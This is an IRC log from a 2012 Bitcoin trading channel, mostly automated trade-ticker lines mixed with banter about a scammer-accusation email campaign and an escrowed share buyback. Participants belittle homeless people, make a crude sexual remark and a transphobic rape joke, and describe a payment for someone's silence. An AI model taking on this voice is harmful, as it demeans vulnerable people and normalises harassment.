[NYAN.A] 1 @ 1 BTC [-] Sep 24 00:47:25 [GLBSE] [PUREASIC] 1 @ 0.8 BTC [-] Sep 24 00:54:40 oops Sep 24 00:56:51 [GLBSE] [FPGAMINING] 4 @ 0.48299999 = 1.932 BTC [+] Sep 24 01:04:10 usagi: you mean your right hand? Sep 24 01:04:27 my right hand is a sexy bitch Sep 24 01:05:18 xD Sep 24 01:09:28 :) Sep 24 01:10:30 https://bitcointalk.org/index.php?topic=112254.new Sep 24 01:10:44 this is hysterical. homeless chick that thinks she's gonna make money out of blogging Sep 24 01:10:49 wants 3 btc to fix her keyboard. Sep 24 01:11:52 anyone wanna sell me some OBSI.1MHS? Sep 24 01:12:12 [MPEX] [S.MPOE] 29600 @ 0.0004123 = 12.2041 BTC [-] Sep 24 01:15:47 [GLBSE] [BBBB] 17 @ 0.00019 = 0.0032 BTC [+] Sep 24 01:21:39 Lol, homeless installing covert miners on computer it borrows/finds? Sep 24 01:21:54 [GLBSE] [OBSI.1MHS] 190 @ 0.1 = 19 BTC [+] Sep 24 01:21:54 Mini hobotnet Sep 24 01:22:07 will buy the rest when funds hit GLBSE Sep 24 01:23:37 BTC-Mining yep Sep 24 01:24:24 Actually seems brillent. If it really does generate 0.3 BTC daily. Sep 24 01:24:59 $3.6 a day income ain't bad when homeless I guess. Sep 24 01:25:03 BTC-Mining she prolly gives head on the side too. Sep 24 01:26:50 Eh Sep 24 01:28:49 did you give head on the side? Sep 24 01:29:21 Why are online chatrooms filled with homeless/ex-homeless people chitchatting? Sep 24 01:29:57 It seems it's far more common in online chatrooms/forums than among an average population sample. Sep 24 01:30:18 You probably know more formerly homeless people than you think Sep 24 01:30:18 BTC-Mining they gotta distract themselves somehow from the simple fact they're failed human beings Sep 24 01:30:29 a lot of people keep it a secret. Sep 24 01:30:47 Hey don't be too rough now mircea eh Sep 24 01:30:53 Obsi: quite possible Sep 24 01:31:06 Hence why they'd go online to talk about it... Sep 24 01:31:10 I suppose Sep 24 01:31:21 BTC-Mining seriously tho. the corporate drone has all the distractions built in the lifestyle Sep 24 01:31:33 there's no corporation helping the homeless avoid the fact Sep 24 01:32:02 Hello nefario **** BEGIN LOGGING AT Mon Sep 24 10:20:44 2012 Sep 24 10:25:29 [MPEX] [S.MPOE] 55348 @ 0.00042 = 23.2462 BTC [+] Sep 24 10:27:03 [MPEX] [S.BVPS] 600 @ 0.00316331 = 1.898 BTC [+] Sep 24 10:27:05 [MPEX] [S.BVPS] 400 @ 0.0030415 = 1.2166 BTC [-] Sep 24 10:29:33 woah Sep 24 10:29:36 the motion finished Sep 24 10:29:40 nefario didnt interfere this time Sep 24 10:29:51 usagi: did you see? Sep 24 10:32:29 so you're back in the seat ? Sep 24 10:32:56 apparently. Sep 24 10:34:50 quick, make some deals! Sep 24 10:35:21 [GLBSE] [BTC-MINING] 1 @ 0.9596 BTC [+] Sep 24 10:41:30 [GLBSE] [YABMC] 1 @ 0.08639 BTC [+] Sep 24 10:43:09 very funny. Sep 24 10:43:25 and nefario hasnt unlocked my glbse account yet I dont think Sep 24 10:44:16 was the auditor put in a dark room with a solar calculator? Sep 24 10:44:30 hope he doesn't plan to push the motion date back again Sep 24 10:44:37 Obsi: he cant now. Sep 24 10:48:48 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.9134576 BTC [+] Sep 24 10:48:51 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.9234576 BTC [+] Sep 24 10:55:03 [MPEX] [S.MPOE] 41893 @ 0.00041935 = 17.5678 BTC [-] Sep 24 10:55:05 [MPEX] [S.MPOE] 4307 @ 0.00041923 = 1.8056 BTC [-] Sep 24 11:01:01 why not ? Sep 24 11:01:19 [GLBSE] [OBSI.HRPT] 3 @ 0.076 = 0.228 BTC [+] Sep 24 11:01:26 google groups is dead anyhow, isnt it? Sep 24 11:01:29 I swear they discontinued it Sep 24 11:01:54 [GLBSE] [ASICMINER] 2 @ 0.115 = 0.23 BTC [+] Sep 24 11:01:54 i think they made a new thing Sep 24 11:01:56 plus or something Sep 24 11:02:27 no, plus is their facebook killer Sep 24 11:02:36 a ok Sep 24 11:02:48 groups was their frontend for usenet that could also create private non-usenet groups Sep 24 11:03:35 its the old deja news, btw Sep 24 11:03:42 if you remember that Sep 24 11:08:51 [GLBSE] [BIB.PIRATE] 90 @ 0.035 = 3.15 BTC [-] Sep 24 11:11:43 [GLBSE] [FOO.PPPPT] 8 @ 0.064 = 0.512 BTC [+] Sep 24 11:11:45 [GLBSE] [FOO.PPPPT] 1 @ 0.0649 BTC [+] Sep 24 11:11:46 [GLBSE] [FOO.PPPPT] 41 @ 0.065 = 2.665 BTC [+] Sep 24 11:13:50 [GLBSE] [ASICMINER] 126 @ 0.115 = 14.49 BTC [+] Sep 24 11:19:54 [GLBSE] [ASICMINER] 2 @ 0.115 = 0.23 BTC [+] Sep 24 11:21:36 [GLBSE] [BMF] 1 @ 0.48999999 BTC [-] Sep 24 11:21:38 [GLBSE] [BMF] 1 @ 0.49 BTC [+] Sep 24 11:22:02 [GLBSE] [BMF] 1 @ 0.4318 BTC [-] Sep 24 11:22:47 [GLBSE] [BMF] 1 @ 0.4316 BTC [-] Sep 24 11:23:04 [MPEX] [S.MPOE] 12500 @ 0.00042 = 5.25 BTC [+] Sep 24 11:23:11 [GLBSE] [BMF] 2 @ 0.49 = 0.98 BTC [+] Sep 24 11:23:37 [GLBSE] [BMF] 2 @ 0.4316 = 0.8632 BTC [-] Sep 24 11:24:10 [GLBSE] [BMF] 2 @ 0.49 = 0.98 BTC [+] Sep 24 11:24:36 [GLBSE] [BMF] 1 @ 0.4315 BTC [-] Sep 24 11:25:02 [GLBSE] [BMF] 1 @ 0.21605 BTC [-] Sep 24 11:30:16 Congrats Diablo-D3 Sep 24 11:31:58 !ticker dmc Sep 24 11:32:10 [GLBSE:DMC] [Bid: 0.031] [Ask: 0.05799999] [Spread: 0.02699999] [Last: 0.03] [24hVol: 11.61369507] [7dAvg: 0.05215918] Sep 24 11:36:04 Yes, someone sell me some DMC already Sep 24 11:38:26 Hey usagi Sep 24 11:41:25 Just got some tormail.org email in, on my webhosting's contact mail, about you Sep 24 11:43:14 Weird... Sep 24 11:43:30 So good news, you're a scammer apparently. Sep 24 11:44:10 BTC-Mining i got that too. Sep 24 11:44:31 some lame-ish links to some usenet. Sep 24 11:46:11 Aye... Sep 24 11:47:24 So anyone has anything they want to dump on the market? I got BTC burning my pockets. Sep 24 11:47:43 [GLBSE] [NYAN.C] 1 @ 0.31869999 BTC [+] Sep 24 11:47:46 [GLBSE] [NYAN.C] 1 @ 0.3187 BTC [+] Sep 24 11:48:58 heh Sep 24 11:49:04 [MPEX] [S.MPOE] 21377 @ 0.00041923 = 8.9619 BTC [-] Sep 24 11:49:27 [GLBSE] [OBSI.HRPT] 8 @ 0.079 = 0.632 BTC [+] Sep 24 11:54:45 Well off I go for now. Sep 24 11:55:33 [GLBSE] [SILVER] 2 @ 0.00995 = 0.0199 BTC [+] Sep 24 11:58:45 [GLBSE] [BTCMC] 2 @ 0.5 = 1 BTC [-] Sep 24 12:00:10 [GLBSE] [V.HRL] 1 @ 0.9989 BTC [-] Sep 24 12:00:16 [GLBSE] [SS] 1 @ 0.0189144 BTC [+] Sep 24 12:00:53 [GLBSE] [V.HRL] 1 @ 0.9022 BTC [-] Sep 24 12:02:28 [GLBSE] [BIB.BVPS] 2 @ 0.004 = 0.008 BTC [-] Sep 24 12:05:32 [GLBSE] [ASICMINER] 10 @ 0.115 = 1.15 BTC [+] Sep 24 12:05:40 [GLBSE] [TEEK.A] 1 @ 0.875 BTC [-] Sep 24 12:05:48 The operation succeeded. Sep 24 12:05:56 sadface, I didn't get the mail about usagi being a scammer Sep 24 12:06:06 I'm just not important enough ;_; Sep 24 12:06:35 [GLBSE] [TEEK.A] 1 @ 0.01100001 BTC [-] Sep 24 12:07:14 Luceo you know it prolly is just a matter of "you're not running a public service with an email people can abuse" Sep 24 12:10:32 mircea_popescu: http://fennec.name ;) Sep 24 12:11:01 mircea_popescu: Can you send the mail to usagi? :P Sep 24 12:11:08 they prolly didn't make the connection. Sep 24 12:11:16 10:06:58 usagi | Mircea has me on ignore, can someone please ask him to send me the letter at cpa@tsukino.ca pls Sep 24 12:11:20 and i;m not interested in what usagi has to say, ty. Sep 24 12:12:08 Oh :P Sep 24 12:13:16 No problem, hope you nail 'em Sep 24 12:17:04 [MPEX] [F.GIGA.ETF] 1000 @ 0.00026395 = 0.264 BTC [-] Sep 24 12:20:26 [GLBSE] [DMC] 20 @ 0.031 = 0.62 BTC [+] Sep 24 12:20:27 [GLBSE] [DMC] 9 @ 0.03 = 0.27 BTC [-] Sep 24 12:20:37 http://www.longwarjournal.org/archives/2012/09/6_harrier_jets_destr.php Sep 24 12:20:49 ~250mn in damages, 15 insurgents dead Sep 24 12:24:14 https://bitcointalk.org/index.php?topic=112220.0 Sep 24 12:24:21 breathtaking Sep 24 12:24:59 dub ya i linked it yest. lolmine. Sep 24 12:43:03 [MPEX] [F.GIGA.ETF] 5902 @ 0.00026395 = 1.5578 BTC [-] Sep 24 12:43:05 [MPEX] [F.GIGA.ETF] 1900 @ 0.00026379 = 0.5012 BTC [-] Sep 24 12:43:06 [MPEX] [F.GIGA.ETF] 1575 @ 0.0002607 = 0.4106 BTC [-] Sep 24 12:45:22 [MPEX] [F.GIGA.ETF] 12054 @ 0.0002706 = 3.2618 BTC [+] Sep 24 12:45:23 [MPEX] [F.GIGA.ETF] 14300 @ 0.00028809 = 4.1197 BTC [+] Sep 24 12:55:48 [GLBSE] [OBSI.HRPT] 5 @ 0.07998 = 0.3999 BTC [+] Sep 24 12:57:10 [GLBSE] [OBSI.HRPT] 3 @ 0.07998 = 0.2399 BTC [+] Sep 24 12:57:11 [GLBSE] [OBSI.HRPT] 5 @ 0.08 = 0.4 BTC [+] Sep 24 12:57:43 [GLBSE] [OBSI.HRPT] 1 @ 0.08 BTC [+] Sep 24 13:15:03 [MPEX] [S.MPOE] 33741 @ 0.00041729 = 14.0798 BTC [-] Sep 24 13:15:05 [MPEX] [S.MPOE] 10559 @ 0.0004169 = 4.402 BTC [-] Sep 24 13:31:17 [GLBSE] [BLUECHIP] 50 @ 0.1 = 5 BTC [+] Sep 24 13:33:40 [GLBSE] [KRAKEN] 30 @ 0.00952 = 0.2856 BTC [-] Sep 24 13:33:42 [GLBSE] [KRAKEN] 15 @ 0.00951 = 0.1427 BTC [-] Sep 24 13:33:43 [GLBSE] [KRAKEN] 10 @ 0.0093 = 0.093 BTC [-] Sep 24 13:33:44 [GLBSE] [KRAKEN] 3 @ 0.009 = 0.027 BTC [-] Sep 24 13:35:19 [GLBSE] [ASICMINER] 19 @ 0.115 = 2.185 BTC [+] Sep 24 13:41:21 [GLBSE] [TYGRR.BOT] 164 @ 0.91 = 149.24 BTC [-] Sep 24 13:41:26 [GLBSE] [GIGAMINING] 1 @ 0.63500002 BTC [-] Sep 24 13:42:04 [MPEX] [S.MPOE] 21035 @ 0.0004169 = 8.7695 BTC [-] Sep 24 13:44:03 [GLBSE] [YABMC] 1 @ 0.0863 BTC [-] Sep 24 13:44:04 [GLBSE] [YABMC] 1 @ 0.08629 BTC [-] Sep 24 13:44:06 [GLBSE] [YABMC] 4 @ 0.086272 = 0.3451 BTC [-] Sep 24 13:44:07 [GLBSE] [YABMC] 7 @ 0.08627 = 0.6039 BTC [-] Sep 24 13:44:08 [GLBSE] [YABMC] 2 @ 0.08205 = 0.1641 BTC [-] Sep 24 13:44:09 [GLBSE] [YABMC] 50 @ 0.0819 = 4.095 BTC [-] Sep 24 13:44:11 [GLBSE] [YABMC] 105 @ 0.08175 = 8.5838 BTC [-] Sep 24 13:44:12 [GLBSE] [BITNODES] 1 @ 0.249 BTC [-] Sep 24 13:45:14 [GLBSE] [TYGRR.BOND-A] 1 @ 0.099 BTC [-] Sep 24 13:49:52 [GLBSE] [OBSI.HRPT] 7 @ 0.07998 = 0.5599 BTC [-] Sep 24 13:50:42 [GLBSE] [OBSI.HRPT] 1 @ 0.07998 BTC [-] Sep 24 13:51:02 [GLBSE] [GIGAMINING] 14 @ 0.64 = 8.96 BTC [+] Sep 24 13:52:11 [GLBSE] [COGNITIVE] 2 @ 0.575 = 1.15 BTC [+] Sep 24 13:56:44 [GLBSE] [ASICMINER] 1 @ 0.115 BTC [+] Sep 24 13:57:28 [GLBSE] [FUTUREFUND] 480 @ 0.000127 = 0.061 BTC [+] Sep 24 13:58:28 dunno Sep 24 13:58:31 what is it supposed to be at Sep 24 13:58:40 [GLBSE] [GIGAMINING] 1 @ 0.66768999 BTC [+] Sep 24 13:59:07 huh Sep 24 13:59:10 I just got tormailed Sep 24 13:59:18 on my other email Sep 24 14:01:02 man, someone seriously wants to have usagi's babies Sep 24 14:01:47 its a he Sep 24 14:09:10 Can I get a copy of the mail? :P Sep 24 14:09:12 Or just post it here Sep 24 14:12:56 [GLBSE] [BFLS] 9 @ 0.63 = 5.67 BTC [+] Sep 24 14:13:03 [MPEX] [S.MPOE] 21400 @ 0.00041733 = 8.9309 BTC [+] Sep 24 14:13:05 [MPEX] [S.MPOE] 19982 @ 0.00041923 = 8.3771 BTC [+] Sep 24 14:13:06 [MPEX] [S.MPOE] 15218 @ 0.00042 = 6.3916 BTC [+] Sep 24 14:14:16 [GLBSE] [GIGAMINING] 1 @ 0.66769 BTC [+] Sep 24 14:14:18 [GLBSE] [GIGAMINING] 11 @ 0.66778999 = 7.3457 BTC [+] Sep 24 14:14:18 [GLBSE] [GIGAMINING] 2 @ 0.66779 = 1.3356 BTC [+] Sep 24 14:14:20 [GLBSE] [GIGAMINING] 4 @ 0.6678 = 2.6712 BTC [+] Sep 24 14:22:33 [GLBSE] [BFLS] 10 @ 0.63 = 6.3 BTC [+] Sep 24 14:23:32 ;;later tell nefario remember to unlock my account Sep 24 14:23:33 The operation succeeded. Sep 24 14:34:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.05341336 BTC [+] Sep 24 14:38:33 [GLBSE] [SILVER] 10 @ 0.00995 = 0.0995 BTC [+] Sep 24 14:38:35 [MPEX] [S.MPOE] 49900 @ 0.00042 = 20.958 BTC [+] Sep 24 14:39:47 [MPEX] [O.BTCUSD.P010N] 42 @ 0.01756613 = 0.7378 BTC [-] Sep 24 14:41:31 [MPEX] [O.BTCUSD.P040T] 9 @ 0.02927307 = 0.2635 BTC [+] Sep 24 14:45:39 [GLBSE] [MU] 1 @ 0.11010003 BTC [-] Sep 24 14:45:40 [GLBSE] [MU] 36 @ 0.11010002 = 3.9636 BTC [-] Sep 24 14:45:41 [GLBSE] [MU] 14 @ 0.11000002 = 1.54 BTC [-] Sep 24 14:54:14 [GLBSE] [TYGRR.TECH] 1 @ 0.9 BTC [-] Sep 24 14:54:16 [GLBSE] [GIGAMINING] 2 @ 0.66768999 = 1.3354 BTC [-] Sep 24 15:02:11 [GLBSE] [GIPPT] 5 @ 0.57 = 2.85 BTC [+] Sep 24 15:04:13 [GLBSE] [OBSI.HRPT] 26 @ 0.08 = 2.08 BTC [+] Sep 24 15:07:47 [MPEX] [F.GIGA.ETF] 5211 @ 0.0002951 = 1.5378 BTC [+] Sep 24 15:09:02 [GLBSE] [BFLS] 15 @ 0.63 = 9.45 BTC [+] Sep 24 15:09:44 [GLBSE] [BFLS] 15 @ 0.63 = 9.45 BTC [+] Sep 24 15:10:51 [GLBSE] [BFLS] 10 @ 0.63 = 6.3 BTC [+] Sep 24 15:12:41 [GLBSE] [BFLS] 1 @ 0.63 BTC [+] Sep 24 15:17:03 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.25634988 = 256.3499 BTC [+] Sep 24 15:18:03 [MPEX] [O.BTCUSD.P130T] 1000 @ 0.07915083 = 79.1508 BTC [-] Sep 24 15:19:04 [MPEX] [O.BTCUSD.P140T] 1000 @ 0.15845575 = 158.4558 BTC [-] Sep 24 15:19:45 [GLBSE] [OBSI.HRPT] 2 @ 0.0791 = 0.1582 BTC [-] Sep 24 15:19:47 [GLBSE] [OBSI.HRPT] 50 @ 0.079 = 3.95 BTC [-] Sep 24 15:19:48 [GLBSE] [OBSI.HRPT] 1 @ 0.07802 BTC [-] Sep 24 15:19:50 [GLBSE] [OBSI.HRPT] 6 @ 0.078 = 0.468 BTC [-] Sep 24 15:19:51 [GLBSE] [OBSI.HRPT] 75 @ 0.077 = 5.775 BTC [-] Sep 24 15:21:22 did SS have some pirate writeoffs? from memory it seems to be selling for a lot cheaper than it was several weeks ago Sep 24 15:23:13 [GLBSE] [OBSI.HRPT] 2 @ 0.071 = 0.142 BTC [-] Sep 24 15:27:55 [GLBSE] [BTC-MINING] 1 @ 0.9596 BTC [+] Sep 24 15:27:56 [GLBSE] [BTC-MINING] 10 @ 0.9598 = 9.598 BTC [+] Sep 24 15:27:58 [GLBSE] [BTC-MINING] 5 @ 0.9598 = 4.799 BTC [+] Sep 24 15:27:59 [GLBSE] [BTC-MINING] 20 @ 0.9599 = 19.198 BTC [+] Sep 24 15:27:59 [GLBSE] [BTC-MINING] 4 @ 0.96 = 3.84 BTC [+] Sep 24 15:28:58 [GLBSE] [GIGAMINING] 1 @ 0.6669 BTC [-] Sep 24 15:31:23 [GLBSE] [PUREMINING] 2 @ 0.10845 = 0.2169 BTC [+] Sep 24 15:36:26 [GLBSE] [YABMC] 2 @ 0.08694969 = 0.1739 BTC [+] Sep 24 15:37:21 [GLBSE] [BITBOND] 5 @ 0.3351 = 1.6755 BTC [-] Sep 24 15:37:23 wow that is quite some drop pigeons Sep 24 15:37:46 hopefully u didn't have any Sep 24 15:38:47 [GLBSE] [DMC] 10 @ 0.02 = 0.2 BTC [-] Sep 24 15:39:40 !ticker ss Sep 24 15:39:44 [GLBSE:SS] [Bid: 0.01511] [Ask: 0.01891441] [Spread: 0.00380441] [Last: 0.0189144] [24hVol: 0.05674219] [7dAvg: 0.01726403] Sep 24 15:39:55 um wasn't it .1 ? Sep 24 15:40:09 [GLBSE] [OBSI.HRPT] 2 @ 0.07002 = 0.14 BTC [-] Sep 24 15:40:16 [GLBSE] [OBSI.HRPT] 10 @ 0.07000001 = 0.7 BTC [-] Sep 24 15:40:22 [GLBSE] [OBSI.HRPT] 2 @ 0.06902 = 0.138 BTC [-] Sep 24 15:40:34 smickles ^^ Sep 24 15:41:35 over 1.5 before the plunge :o Sep 24 15:41:52 wtf. Sep 24 15:41:53 [GLBSE] [OBSI.HRPT] 10 @ 0.069 = 0.69 BTC [-] Sep 24 15:41:54 [GLBSE] [OBSI.HRPT] 5 @ 0.06702 = 0.3351 BTC [-] Sep 24 15:43:45 [GLBSE] [OBSI.HRPT] 25 @ 0.067 = 1.675 BTC [-] Sep 24 15:46:11 [GLBSE] [OBSI.HRPT] 2 @ 0.06661 = 0.1332 BTC [-] Sep 24 15:46:13 [GLBSE] [OBSI.HRPT] 7 @ 0.06502 = 0.4551 BTC [-] Sep 24 15:46:14 [GLBSE] [OBSI.HRPT] 33 @ 0.065 = 2.145 BTC [-] Sep 24 15:46:17 [GLBSE] [OBSI.HRPT] 4 @ 0.065 = 0.26 BTC [-] Sep 24 15:48:04 [MPEX] [S.BVPS] 350 @ 0.00306449 = 1.0726 BTC [+] Sep 24 15:48:40 [GLBSE] [JAH] 2 @ 0.12 = 0.24 BTC [+] Sep 24 15:51:55 watch out EskimoBob, usagi is just a man in a dress, he might rape you prison style Sep 24 15:52:52 o wait Sep 24 15:52:57 pigeons i think it did a 1:100 split Sep 24 15:53:02 do you have 100x as many shares as before ? Sep 24 15:53:37 [GLBSE] [OBSI.HRPT] 21 @ 0.065 = 1.365 BTC [-] Sep 24 15:54:14 [GLBSE] [OBSI.HRPT] 2 @ 0.06302 = 0.126 BTC [-] Sep 24 15:54:15 [GLBSE] [OBSI.HRPT] 2 @ 0.0629 = 0.1258 BTC [-] Sep 24 15:54:16 [GLBSE] [OBSI.HRPT] 1 @ 0.0616 BTC [-] Sep 24 15:54:59 [GLBSE] [OBSI.HRPT] 10 @ 0.064 = 0.64 BTC [+] Sep 24 15:56:03 usagi: http://www.fennec.name/index.php/promotional-offers-insurance-ssl-certs-domains/ - Opinion? ^^ Sep 24 15:56:09 [GLBSE] [OBSI.HRPT] 64 @ 0.064 = 4.096 BTC [+] Sep 24 15:58:02 lol Sep 24 15:58:04 lol Sep 24 15:58:09 WARNING: Currently not authenticated. User eskimobob, rated since Sat Jun 4 09:35:57 2011. Cumulative rating 2, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=eskimobob Sep 24 15:58:14 LOL Sep 24 15:58:20 I'll escrow if you want -_- Sep 24 15:58:22 idc lol Sep 24 15:58:26 ;;getrating usagi Sep 24 15:58:27 Currently authenticated from hostmask usagi!~usagi@111-255-132-249.dynamic.hinet.net . User Usagi, rated since Mon Jun 18 09:33:55 2012. Cumulative rating 40, from 23 total ratings. Received ratings: 23 positive, 0 negative. Sent ratings: 25 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Usagi Sep 24 15:58:38 and this is why EskimoBob might end up getting himself a scammer tag on bitcointalk Sep 24 15:59:40 EskimoBob: hes willing to make you a profit, dude Sep 24 15:59:43 isnt that what you wanted? Sep 24 16:02:57 [GLBSE] [YABMC] 2 @ 0.08624963 = 0.1725 BTC [-] Sep 24 16:04:18 EskimoBob: Provide the address here so everyone can see if the coins are sent Sep 24 16:05:44 EskimoBob: I was telling you to provide the address you want usagi to send to Sep 24 16:05:58 So there is definitive proof that the coins ARE sent Sep 24 16:06:46 EskimoBob: usagi is, and I'd recommend he doesn't send you a single satoshi to a private address Sep 24 16:07:17 [GLBSE] [GIGAMINING] 1 @ 0.64110001 BTC [-] Sep 24 16:07:18 [GLBSE] [GIGAMINING] 20 @ 0.6411 = 12.822 BTC [-] Sep 24 16:07:20 [GLBSE] [GIGAMINING] 7 @ 0.6402 = 4.4814 BTC [-] Sep 24 16:07:24 [GLBSE] [GIGAMINING] 18 @ 0.64 = 11.52 BTC [-] Sep 24 16:07:46 I have no affiliation with BMF so idk why you'd think I'd buy them :P Sep 24 16:08:33 usagi: Escrow address generated - 1Lc6xYuX8JQJeCTdgJxX4g1tFeXb4YBHLn Sep 24 16:08:47 EskimoBob: What's your refund address? Sep 24 16:09:28 Thanks usagi, appreciate it Sep 24 16:10:08 I will send 53 BTC to EskimoBob when a) he provides an address to send to here publically (not sending to a private address and being accused of not sending) and b) usagi confirms receipt of shares Sep 24 16:10:29 ;;getrating luceo Sep 24 16:10:30 Currently authenticated from hostmask Luceo!~Luc3o@gateway/tor-sasl/luceo . User Luceo, rated since Tue Jun 12 11:09:09 2012. Cumulative rating 60, from 45 total ratings. Received ratings: 43 positive, 2 negative. Sent ratings: 49 positive, 5 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Luceo Sep 24 16:11:16 Rating entry successful. Your rating for user luceo has changed from 2 to 5. Sep 24 16:11:31 EskimoBob: I can confirm receipt of usagi's 53 BTC, ready to send. Sep 24 16:12:11 ;;rated usagi Sep 24 16:12:12 You rated user usagi on Fri Jul 13 11:36:53 2012, giving him a rating of 2, and supplied these additional notes: Sold me 20 shares in YARR over IRC, sent immediately, pleasure to trade with.. Sep 24 16:12:34 I didn't ask you to send me anything, I asked you to post an address for the 53 BTC... Sep 24 16:13:11 ;;rate usagi 5 Multiple business transactions & works with FIS, tips well for escrow, pleasant & knowledgeable. Sep 24 16:13:12 Rating entry successful. Your rating for user usagi has changed from 2 to 5. Sep 24 16:14:08 How many shares did he sell you? Sep 24 16:14:50 EskimoBob: How many shares did usagi sell to you? Sep 24 16:15:24 this is hysterical to read. Sep 24 16:16:03 [MPEX] [F.GIGA.ETF] 9889 @ 0.0002951 = 2.9182 BTC [+] Sep 24 16:16:08 [MPEX] [F.GIGA.ETF] 3211 @ 0.00029268 = 0.9398 BTC [-] Sep 24 16:16:09 EskimoBob: So you only want to sell 10 back to him? or want to sell more? Sep 24 16:19:14 usagi: EskimoBob says you only sold him 10 shares Sep 24 16:20:50 So all this fuss is about like 5 BTC? ^^ Sep 24 16:20:52 Whoa Sep 24 16:21:07 whoa Sep 24 16:21:26 usagi: What address would you like me to send back to? Sep 24 16:21:34 usagi great attitude Sep 24 16:22:27 usagi that was sarcasm Sep 24 16:23:26 usagi i'm not even sure what you responding to above, but I personally would probably never type something like that Sep 24 16:23:52 EskimoBob: You can give me your address here, I dont want it in PM, ty Sep 24 16:24:05 That way there's no doubt what's been sent where Sep 24 16:24:51 usagi i run the largest mining bond, people call me all sorts of things Sep 24 16:25:27 just go look at the gigamining thread, DILLIGAF and EskimoBob have not been kind at times Sep 24 16:25:43 o hi EskimoBob Sep 24 16:25:48 EskimoBob: I need it public, why can't you publish it? Sep 24 16:26:03 see what I'm saying Sep 24 16:26:09 EskimoBob is not nice Sep 24 16:26:21 doesn't mean I have to be rude back Sep 24 16:26:32 gigavps you're lucky you're not greek. Sep 24 16:26:44 usagi kill them with kindness :) Sep 24 16:26:50 EskimoBob: If you dont want to publish your address, please confirm the sha256sum of your address is e4fffb588c6fbe69f74fe9a2982d7c72e9b44ba7fc6ebdd4ba22ae1301a2c9fb Sep 24 16:26:52 EskimoBob i know you do Sep 24 16:27:56 !pl GIGAMINING 1 Sep 24 16:27:57 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 16:28:18 GIGAMINING [1@1BTC] paid: 0.46887596 BTC. Last price: 0.64 BTC. Capital gain: -0.36 BTC. Total: 0.10887596 BTC. (10.9%) Sep 24 16:28:33 EskimoBob: I need you to confirm either your address or the sha256sum of your address so I can pay you. This is so you can't complain I did not pay. Thanks. Sep 24 16:29:10 [GLBSE] [GSDPT] 11 @ 0.0033 = 0.0363 BTC [+] Sep 24 16:29:24 EskimoBob look, GIGAMINING has a 10.9% return on investment from IPO Sep 24 16:29:53 EskimoBob: I don't have any sock puppets :P Sep 24 16:30:12 Can you please just confirm your address or the sha256sum? Sep 24 16:30:26 awwwww, EskimoBob, i thought we were friends Sep 24 16:30:39 If you dont want the address to be traceable to you, give me a deposit address to your btc-e or mtgox account Sep 24 16:31:05 (or glbse) Sep 24 16:32:39 usagi: Can you tell EskimoBob that he needs to put his address here? Sep 24 16:32:54 I'm not willing to send to one he will only PM to me, too much potential for dispute Sep 24 16:33:26 Luceo : have him pm it as a gpg signed document Sep 24 16:33:40 problem solved. Sep 24 16:33:58 EskimoBob: OK sec, I'll withdraw to you from btc-e as this tx hasn't confirmed Sep 24 16:34:39 aa42d6454a99464974925edc0cf56674acd5891ecf966d74142c8fbca6f11e62 Sep 24 16:35:42 Coin is sent Sep 24 16:35:56 http://blockchain.info/tx-index/27356915/aa42d6454a99464974925edc0cf56674acd5891ecf966d74142c8fbca6f11e62 Sep 24 16:36:22 [GLBSE] [GIGAMINING] 3 @ 0.6667 = 2.0001 BTC [+] Sep 24 16:36:23 [GLBSE] [GIGAMINING] 1 @ 0.66689999 BTC [+] Sep 24 16:37:06 quite entertaining to watch though Sep 24 16:37:30 lol EskimoBob, you were the one who wouldnt trust usagi with 5 BTC and wouldn't post your address lol Sep 24 16:37:40 MoneyIsDebt indeed Sep 24 16:37:52 [GLBSE] [BFLS.RIG] 4 @ 0.75 = 3 BTC [+] Sep 24 16:39:24 usagi: Will send it as soon as I get confs ^^ I dont have access to my main wallet Sep 24 16:40:19 usagi: Sent Sep 24 16:40:47 usagi: 1ac7a169ea0db3f18dc69952714ff70ce7f4d157bb7da949684ecd16a8a70da8 Sep 24 16:41:05 EskimoBob: How is offering escrow services brown-nosing? What's your problem exactly? :P Sep 24 16:42:35 Rating entry successful. Your rating of 1 for user EskimoBob has been recorded. Sep 24 16:42:58 [MPEX] [S.MPOE] 39000 @ 0.00041702 = 16.2638 BTC [-] Sep 24 16:43:05 ;;rate EskimoBob 1 Did escrow between him and usagi, all worked out in the end. Sep 24 16:43:07 Rating entry successful. Your rating of 1 for user EskimoBob has been recorded. Sep 24 16:44:43 [GLBSE] [ASICMINER] 500 @ 0.115 = 57.5 BTC [+] Sep 24 16:47:46 EskimoBob: The deal included you having to stfu about usagi and usagi's businesses :P Therefore if you don't, you're a scammer Sep 24 16:48:12 you're paying EskimoBob off to keep quite? Sep 24 16:48:19 I'm not :P Sep 24 16:48:26 sounds like extortion Sep 24 16:48:41 gigavps: More like bribery :P Sep 24 16:49:15 uh oh Sep 24 16:49:21 [GLBSE] [BDK.BND] 48 @ 0.097 = 4.656 BTC [-] Sep 24 16:49:22 [GLBSE] [BDK.BND] 90 @ 0.098 = 8.82 BTC [+] Sep 24 16:49:37 sounds like it's resolved then Sep 24 16:49:39 15:00:49 usagi | The deal is you have to shut the fuck up about me and my businesses from now. Sep 24 16:49:44 The log says otherwise :P Sep 24 16:50:36 I think it's funny that you could be the first person to become a scammer on bitcointalk just for having a loud mouth Sep 24 16:50:51 But a deal's a deal, you sold your silence, now stick to it Sep 24 16:52:15 I've never known usagi to act fraudulently Sep 24 16:52:45 If he did I'd call him out on it Sep 24 16:58:24 [GLBSE] [GIGAMINING] 3 @ 0.6667 = 2.0001 BTC [-] Sep 24 16:58:25 [GLBSE] [GIGAMINING] 5 @ 0.667 = 3.335 BTC [+] Sep 24 17:08:04 [MPEX] [F.GIGA.ETF] 9189 @ 0.00029268 = 2.6894 BTC [-] Sep 24 17:08:04 [MPEX] [F.GIGA.ETF] 2200 @ 0.0002924 = 0.6433 BTC [-] Sep 24 17:08:07 [MPEX] [F.GIGA.ETF] 4411 @ 0.00029208 = 1.2884 BTC [-] Sep 24 17:09:19 [GLBSE] [GIGAMINING] 1 @ 0.6668 BTC [-] Sep 24 17:21:08 who applies for jobs anymore Sep 24 